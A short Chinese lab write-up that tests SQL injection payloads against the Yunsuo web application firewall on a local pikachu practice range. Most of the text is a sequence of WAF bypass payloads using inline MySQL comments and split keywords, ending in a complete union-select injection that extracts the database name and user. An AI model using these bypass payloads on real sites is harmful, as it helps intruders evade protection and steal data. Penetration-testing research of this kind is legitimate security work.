sql注入bass云锁

实验环境

云锁官网
https://www.yunsuo.com.cn/
下载的是公有云版本云锁服务器端Windows版本
搭建的服务器是phpstudy版本的 Apache+mysql
使用的漏洞集成是pikachu的字符型SQL注入

payload: kobe’ order by 2 –+
and 1=1 –+ 不拦截
and 1=2 –+ 不拦截
order by 拦截了

在这里插入图片描述

使用内联注入 /!100001by/ /!500005by/

bypass: kobe’ order /!10001by/ 2

在这里插入图片描述

kobe’ and 1=2 union select 1,2 –+
拦截了union select

在这里插入图片描述

union 不拦截
select 不拦截
union select 拦截
union 字符 select 拦截
union /select/ 不拦截

bypass: kobe’ and 1=2 union /!50000all select/ 1,2
显示的位置为1和2

在这里插入图片描述

拦截了database()，user()

bypass: database//() user//()

完整的bypass语句：
kobe’ and 1=2 union /!50001all select/ database//(),user//() –+

在这里插入图片描述

成功获取：
uid:pikachu
email:root@localhost